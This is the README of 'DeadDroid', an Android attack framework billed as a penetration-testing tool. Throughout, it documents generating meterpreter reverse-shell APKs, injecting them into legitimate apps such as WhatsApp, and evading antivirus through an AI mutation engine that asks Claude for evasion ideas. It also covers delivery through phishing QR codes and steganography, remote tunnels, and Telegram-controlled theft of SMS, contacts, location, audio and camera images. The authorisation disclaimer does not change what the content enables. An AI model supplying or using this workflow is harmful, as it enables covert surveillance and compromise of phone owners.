██████╗ ███████╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗██████╗
██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██╔═══██╗██║██╔══██╗
██║ ██║█████╗ ███████║██║ ██║██║ ██║██████╔╝██║ ██║██║██║ ██║
██║ ██║██╔══╝ ██╔══██║██║ ██║██║ ██║██╔══██╗██║ ██║██║██║ ██║
██████╔╝███████╗██║ ██║██████╔╝██████╔╝██║ ██║╚██████╔╝██║██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝╚═════╝
The most advanced open-source Android penetration testing framework — built for professionals.
DeadDroid is developed for authorised penetration testing, security research, and educational purposes only. Using this tool against systems without explicit written permission is illegal and may result in criminal prosecution. The author assumes zero liability for misuse. You are solely responsible for your actions.
- Features
- Architecture
- Requirements
- Installation
- Quick Start
- Module Guide
- Configuration
- Usage Examples
- Troubleshooting
- Developer
- License
Every other Android pentest tool gives you a payload generator and a session shell. DeadDroid gives you an entire operations platform — features that simply don't exist anywhere else.
| Feature | TheFatRat | AhMyth | Ghost | AndroRAT | DeadDroid |
|---|---|---|---|---|---|
| Payload generation | ✔ | ✔ | ✔ | ✔ | ✔ |
| APK binding | ✔ | ✔ | ✗ | ✗ | ✔ |
| Session management | ✗ | ✔ | ✔ | ✔ | ✔ |
| Live TUI dashboard | ✗ | ✗ | ✗ | ✗ | ✔ |
| Telegram remote control | ✗ | ✗ | ✗ | ✗ | ✔ |
| Campaign manager | ✗ | ✗ | ✗ | ✗ | ✔ |
| Payload DNA tracking | ✗ | ✗ | ✗ | ✗ | ✔ |
| AI mutation engine | ✗ | ✗ | ✗ | ✗ | ✔ |
| Steganography delivery | ✗ | ✗ | ✗ | ✗ | ✔ |
| Android CVE scanner | ✗ | ✗ | ✗ | ✗ | ✔ |
| Mass payload batch | ✗ | ✗ | ✗ | ✗ | ✔ |
| Claude AI advisor | ✗ | ✗ | ✗ | ✗ | ✔ |
| HTML report generator | ✗ | ✗ | ✗ | ✗ | ✔ |
| Auto session keepalive | ✗ | ✗ | ✗ | ✗ | ✔ |
| Module | Description |
|---|---|
| Payload Generator | Generate Android APK payloads using msfvenom — 5 payload types, multiple encoders, auto-obfuscation |
| APK Binder | Inject Metasploit payloads into legitimate APKs — decompile → inject → recompile → sign, fully automated |
| Session Manager | Full Metasploit RPC integration — list sessions, run commands, device info, file ops, GPS, mic, camera |
| ngrok Manager | TCP & HTTP tunnel management via ngrok API v3 — start, list, stop tunnels in-tool |
| Port Forwarding | socat, SSH -L/-R tunnels, iptables PREROUTING — multi-backend forwarding engine |
| Report Generator | Generate professional HTML pentest reports with severity-rated findings |
| AI Assistant | Claude-powered pentest advisor — real-time guidance, technique suggestions, report help |
| Configuration | Persistent settings — MSF RPC credentials, default LHOST/LPORT, keepalive intervals |
| Feature | Description |
|---|---|
| Auto Session Fetch | Polls Metasploit RPC for new sessions — automatically starts keepalive on each new connection |
| Long Session Keepalive | Background thread sends periodic getuid heartbeats to prevent session timeout |
| QR Payload Delivery | Generate QR codes pointing to payload download URLs for social-engineering simulations |
| Auto Multi-Handler | One-click Metasploit listener launch with auto-run post-exploitation scripts |
| SSL Pinning Bypass | Auto-generate Frida scripts to bypass certificate pinning in Android apps |
| ADB Helpers | List devices, open shells, install APKs — ADB wrapped in a clean TUI |
| Network Scanner | nmap-powered live host discovery and port scanning |
| Listener Monitor | Poll a port and alert when a session connects — no more watching the terminal |
| Claude AI Chat | Persistent conversation with prompt caching — ask anything about Android pentesting |
DeadDriod/
├── main.py ← Entry point — main menu, module loader
├── config.py ← Persistent settings (JSON-backed)
├── requirements.txt ← Python dependencies
├── setup.sh ← One-shot installer (Kali/Debian/Ubuntu)
└── core/
├── banner.py ← ASCII art, version, developer info
├── utils.py ← Shared helpers — IPs, tool checks, workspace
├── payload_gen.py ← msfvenom wrapper, payload menu, RC script gen
├── apk_binder.py ← Full APK injection pipeline (apktool + smali)
├── session_mgr.py ← Metasploit RPC client, keepalive, device ops
├── ngrok_handler.py ← ngrok v3 API — TCP/HTTP tunnel management
├── network.py ← socat, SSH tunnels, iptables forwarding
├── ai_assistant.py ← Claude AI with prompt caching, sign-in/out
├── reporter.py ← HTML report generator with severity badges
├── extras.py ← QR, auto-handler, ADB, scanner, Frida bypass
├── dashboard.py ← ★ Live TUI session dashboard
├── telegram_bot.py ← ★ Telegram push alerts + remote control
├── campaign.py ← ★ Campaign & target manager
├── payload_dna.py ← ★ Per-payload DNA tracking system
├── ai_mutator.py ← ★ AI-powered smali mutation engine
├── stego_delivery.py ← ★ LSB steganography payload delivery
├── cve_scanner.py ← ★ Android CVE fingerprint + NVD lookup
└── mass_payload.py ← ★ Batch payload generator with DNA + ZIP
~/.deaddroid/
├── payloads/ ← Generated APKs, RC scripts, QR codes
├── sessions/ ← Session logs
├── reports/ ← HTML pentest reports
├── logs/ ← deaddroid.log
├── certs/ ← Debug keystore for APK signing
├── config.json ← User settings
└── ai_config.json ← Claude API key (encrypted path)
| Tool | Purpose | Install |
|---|---|---|
python3.10+ |
Runtime | apt install python3 |
msfvenom / msfconsole |
Payload gen & handlers | apt install metasploit-framework |
apktool |
APK decompile/recompile | apt install apktool |
keytool / jarsigner |
APK signing | apt install default-jdk |
adb |
ADB shell helpers | apt install adb |
socat |
Port forwarding | apt install socat |
nmap |
Network scanner | apt install nmap |
ngrok |
Tunnel management | See ngrok.com/download |
frida |
SSL pinning bypass | pip install frida-tools |
rich>=13.7.0 # Beautiful terminal UI
anthropic>=0.25.0 # Claude AI API
pymetasploit3>=1.0.3 # Metasploit RPC client
qrcode[pil]>=7.4.2 # QR code generation
Pillow>=10.0.0 # Image handling
requests>=2.31.0 # HTTP utilities
# Clone the repository
git clone https://github.com/faizzyhon/DeadDroid.git
cd DeadDroid
# Run the installer as root
chmod +x setup.sh
sudo ./setup.sh
# Launch from anywhere
deaddroid# 1. Clone
git clone https://github.com/faizzyhon/DeadDroid.git
cd DeadDroid
# 2. Install system tools (Kali / Debian / Ubuntu)
sudo apt update
sudo apt install -y python3 python3-pip python3-venv \
default-jdk apktool adb socat nmap \
metasploit-framework curl git
# 3. Install ngrok
curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
| sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null
echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
| sudo tee /etc/apt/sources.list.d/ngrok.list
sudo apt update && sudo apt install ngrok
# 4. Create virtual environment
python3 -m venv venv
source venv/bin/activate
# 5. Install Python dependencies
pip install -r requirements.txt
# 6. Run
python3 main.pygit clone https://github.com/faizzyhon/DeadDroid.git && \
cd DeadDroid && sudo ./setup.sh# 1. Start Metasploit RPC (needed for session management)
start-msfrpc msf123 55553
# 2. Add your ngrok authtoken (optional, for remote testing)
ngrok config add-authtoken YOUR_NGROK_TOKEN
# 3. Launch DeadDroid
deaddroidYou'll see the main menu:
╭─────────────────── Main Menu ───────────────────╮
│ [1] ⚡ Payload Generator │
│ [2] 🔧 APK Binder │
│ [3] 📡 Session Manager │
│ [4] 🌐 ngrok Tunnel Manager │
│ [5] 🔀 Network & Port Forwarding │
│ [6] ✨ Extra Features │
│ [7] 📝 Report Generator │
│ [8] 🤖 AI Assistant (Claude) │
│ [9] ⚙️ Configuration │
│ [0] 🚪 Exit │
╰─────────────────────────────────────────────────╯
Generate Android APK payloads using msfvenom.
Supported payloads:
| # | Payload | Description |
|---|---|---|
| 1 | android/meterpreter/reverse_tcp |
Classic reverse TCP meterpreter |
| 2 | android/meterpreter/reverse_https |
Encrypted HTTPS (evades basic IDS) |
| 3 | android/shell/reverse_tcp |
Lightweight raw shell |
| 4 | android/meterpreter/reverse_http |
HTTP meterpreter |
| 5 | android/meterpreter/bind_tcp |
Bind TCP (device listens) |
Features:
- Encoder selection (shikata_ga_nai, custom iterations)
- ngrok integration — LHOST auto-set to tunnel address
- Auto-generates Metasploit RC handler script
- Payload saved to
~/.deaddroid/payloads/
# Example flow
Select payload: 2 (reverse_https)
LHOST: 192.168.1.10
LPORT: 4444
Use ngrok? Yes
→ Payload: ~/.deaddroid/payloads/payload_abc123.apk
→ Handler: ~/.deaddroid/payloads/payload_abc123.rcInject a Metasploit payload into an existing APK for social-engineering assessment.
Pipeline:
- Decompile host APK with
apktool - Generate msfvenom payload APK
- Decompile payload APK
- Copy payload smali classes into host
- Merge required Android permissions
- Hook launcher Activity's
onCreate - Recompile with
apktool - Sign with debug keystore (
jarsigner)
# Example
Path to target APK: /home/user/whatsapp.apk
LHOST: 192.168.1.10
LPORT: 5555
→ Output: ~/.deaddroid/payloads/bound_whatsapp_ab12.apk
→ SHA-256: d4e5f6...Note: Only use on APKs you own or have written authorisation to test.
Full Metasploit RPC integration via pymetasploit3.
Capabilities:
| Command | Description |
|---|---|
| List sessions | View all active Meterpreter sessions |
| Run command | Execute any Meterpreter command |
| Device info | getuid + sysinfo + ifconfig + ps |
| Screenshot | Capture device screen |
| Dump SMS | Extract SMS messages |
| Dump contacts | Extract contact list |
| GPS location | geolocate |
| Record mic | Record microphone audio |
| Webcam snap | Capture front/rear camera photo |
| Download/Upload | File transfer |
| Keepalive | Background thread prevents session timeout |
| Auto-fetch | Poll for new sessions, auto-start keepalive |
Auto Session Fetch:
Poll interval (s): 5
Watch duration (s): 600
→ Polls every 5s, automatically starts keepalive on every new sessionManage ngrok tunnels via the ngrok v3 API (no authtoken required in tool — configure via ngrok config add-authtoken).
[1] Start TCP tunnel → Get public_host:port for LHOST
[2] Start HTTP tunnel → Get HTTPS URL for web delivery
[3] List active tunnels
[4] Stop all tunnelsMultiple forwarding backends:
| Method | Use Case |
|---|---|
| socat forward | Redirect local port to remote host |
| socat reverse | Open reverse relay listener |
| SSH -L | Tunnel through SSH server (local forward) |
| SSH -R | Expose local port on remote SSH server |
| iptables PREROUTING | Kernel-level port redirect (root required) |
Generate a QR code PNG pointing to a payload URL — print it, embed it in a phishing email, or display on screen for social-engineering simulation.
One-click Metasploit listener with auto-run post-exploitation. Writes .rc file and launches msfconsole automatically.
- List connected devices
- Open interactive ADB shell
- Install APKs directly to device
nmap-powered: scan a subnet, discover live hosts, enumerate top 100 ports.
Auto-generates a Frida script targeting TrustManagerImpl and SSLContext to bypass certificate pinning. Deploy with:
frida -U -l ssl_bypass.js -f com.target.appPolls a port every N seconds and alerts when a connection arrives — great for knowing the moment a payload fires on a remote assessment.
Generate professional HTML pentest reports with:
- Executive summary
- Scope & methodology table
- Findings with severity badges (Critical / High / Medium / Low / Info)
- Evidence blocks with syntax highlighting
- Payload summary table
- Recommendations
- Professional dark-theme design
Report title: Android Security Assessment Q2 2025
Tester: Security Team
Target: com.example.banking
→ Opens in browser: file:///~/.deaddroid/reports/report_Android_Security...htmlConnect your Anthropic API key for real-time pentest guidance powered by Claude Sonnet.
Sign In:
[8] AI Assistant → Sign In
Enter Anthropic API key: sk-ant-...
✔ Claude AI connected successfully!What you can ask:
- "What post-exploitation modules work best on Android 13?"
- "Write a msfvenom one-liner for reverse_https with shikata encoding"
- "How do I pivot from a Meterpreter session to the internal network?"
- "Review my findings and suggest a CVSS score"
- "Generate an executive summary for my report"
Features:
- Persistent conversation history (last 20 turns)
- Prompt caching for efficiency (lower API costs)
/clear— reset conversation/exit— return to main menu- Offline-safe: works without AI key, just shows sign-in prompt
Settings are stored at ~/.deaddroid/config.json.
| Key | Default | Description |
|---|---|---|
msf_rpc_host |
127.0.0.1 |
Metasploit RPC server address |
msf_rpc_port |
55553 |
Metasploit RPC port |
msf_rpc_password |
msf123 |
Metasploit RPC password |
default_lhost |
auto | Default listener IP |
default_lport |
4444 |
Default listener port |
keepalive_interval |
60 |
Session keepalive interval (seconds) |
auto_sign_apk |
true |
Auto-sign generated APKs |
ngrok_authtoken |
— | ngrok authentication token |
# Step 1: Start Metasploit RPC
start-msfrpc msf123 55553
# Step 2: Launch DeadDroid
deaddroid
# Step 3: Generate payload with ngrok tunnel
→ [1] Payload Generator
→ Select: android/meterpreter/reverse_https
→ Use ngrok? Yes
→ Output: payload_abc123.apk + payload_abc123.rc
# Step 4: Start listener
msfconsole -r ~/.deaddroid/payloads/payload_abc123.rc
# Step 5: Deliver payload (ADB for lab, or QR for simulation)
→ [6] Extra Features → ADB Helpers → Install APK
# Step 6: Auto-fetch & keepalive
→ [3] Session Manager → Auto session fetch
# Step 7: Post-exploitation
→ Session Manager → Device info / Screenshot / Dump SMS
# Step 8: Report
→ [7] Report Generator# On your VPS: allow remote port forwarding
# In DeadDroid:
→ [5] Network & Port Forwarding → SSH reverse forward (-R)
→ Remote port: 4444
→ Local port: 4444
→ SSH server: your-vps.com
→ SSH user: root
# Then generate payload with LHOST=your-vps.com LPORT=4444A real-time Rich TUI that auto-refreshes every 2 seconds showing all Meterpreter sessions, uptime timers, keepalive status, GPS location and device info — all in one screen. Automatically starts keepalive and fires Telegram notifications on every new session.
→ [9] Live Dashboard
→ Auto-start keepalive on new sessions? Yes
# Full-screen live view updates continuously — Ctrl+C to exitNo other Android pentest tool has a live session dashboard.
Configure a Telegram bot once — then control every session from your phone, no terminal needed.
Setup:
→ [10] Telegram Remote Control → Setup
# Paste bot token + chat ID
# Bot sends ✅ confirmation to your TelegramBot commands (from Telegram):
/sessions — List all active sessions
/use 3 — Select session 3
/info — sysinfo + uid
/ss — Take screenshot
/sms — Dump all SMS messages
/contacts — Dump contacts
/loc — Get GPS coordinates
/mic 15 — Record 15 seconds of audio
/cam — Webcam photo
/shell getuid — Run any Meterpreter command
/keepalive — Start keepalive on selected session
When a new session opens, you get an instant push notification with full device info.
Track a complete penetration test engagement — targets, payloads, sessions, notes, and timeline — all in one persistent campaign file.
→ [11] Campaign Manager → New Campaign
Campaign name: "Client ABC Android Assessment Q2"
→ Add targets → Link payloads → Track sessions
→ View timeline → Export to HTML reportCampaigns are stored at ~/.deaddroid/campaigns/<id>.json — survive reboots, shareable with teammates.
Every payload gets a unique 16-char hex DNA tag embedded in the APK smali. When a session opens, DeadDroid reads the DNA to instantly answer:
- Which payload file generated this session?
- Which target was it deployed against?
- Which campaign does it belong to?
→ [12] Payload DNA Tracker → Show DNA Registry
DNA ID | Payload | Target | Session
A3F812C09D7E1B4A | payload_abc123.apk | Target 1 | 3Point the engine at any generated APK — it:
- Decompiles the smali and scans for ~8 known AV signature patterns
- Applies string mutations — renames Metasploit class paths to look like Android system classes
- Sends findings to Claude AI for additional evasion suggestions
- Recompiles and signs the mutated APK
→ [13] AI Mutation Engine
Path to APK: /root/.deaddroid/payloads/payload.apk
Use Claude AI analysis? Yes
→ Signatures found: 6
→ Mutations applied: 14
→ Claude: "Consider also renaming the Application class entry..."
→ Output: payload_mutated.apkHide a payload download URL inside a normal JPEG/PNG using LSB steganography. The output image is visually identical — pixels differ only in their least-significant bit.
→ [14] Steganography Delivery → Hide URL in image
Cover image: /home/user/profile.jpg
URL to hide: http://192.168.1.10:8080/payload.apk
→ Output: stego_profile.png (looks identical to original)Share the image in a social-engineering simulation. The receiver runs the decoder to extract the URL.
python stego_decoder.py stego_profile.png
Hidden message: http://192.168.1.10:8080/payload.apkConnect a device via ADB (or enter version manually) — DeadDroid fingerprints the OS build and security patch level, then cross-references against a curated database of 12+ high-impact CVEs (Stagefright, Janus, Binder OOB, ZygoteProcess injection, etc.) plus optionally queries the NVD API for recent CVEs.
→ [15] Android CVE Scanner → Scan connected device (ADB)
→ Device: Samsung Galaxy A53 Android 12 Patch: 2022-08-01
CVE ID | Severity | CVSS | Description
CVE-2022-20465 | Critical | 9.1 | Lockscreen bypass
CVE-2022-20452 | High | 8.4 | NotificationManager privilege escalation
CVE-2021-39793 | Critical | 8.8 | GPU driver heap OOB writeGenerate a configurable batch of unique payloads in one command — each with a different port, encoder type and iteration count. Every payload gets:
- A DNA tracking tag
- An individual Metasploit RC handler script
- A master RC script that loads all handlers at once
→ [16] Mass Payload Generator
LHOST: 192.168.1.10
Starting port: 4444
Number of payloads: 20
Add DNA tags? Yes
ZIP outputs? Yes
→ Generated 20 payloads in ~/.deaddroid/payloads/batch_a1b2c3/
→ Master handler: batch_a1b2c3/master_handler.rc
→ batch_a1b2c3.zipsudo apt install metasploit-framework
# Or on non-Kali:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | sudo rubysudo apt remove apktool
wget https://github.com/iBotPeaches/Apktool/releases/latest/download/apktool_*.jar
sudo mv apktool_*.jar /usr/local/bin/apktool.jar
# Wrapper: https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool# Start RPC daemon first:
start-msfrpc msf123 55553
# Wait ~10 seconds for msfrpcd to initialise# Add your authtoken:
ngrok config add-authtoken YOUR_TOKEN_FROM_dashboard.ngrok.com- Get a free key at console.anthropic.com
- Keys start with
sk-ant-
DEADDROID_DEBUG=1 deaddroidAndroid Security Researcher | Penetration Tester | Tool Developer
"Security through knowledge, not obscurity."
- Fork the repository
- Create a feature branch:
git checkout -b feature/new-module - Commit changes:
git commit -m "Add: new-module description" - Push:
git push origin feature/new-module - Open a Pull Request
MIT License
Copyright (c) 2025 faizzyhon
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. THE AUTHOR
IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS SOFTWARE.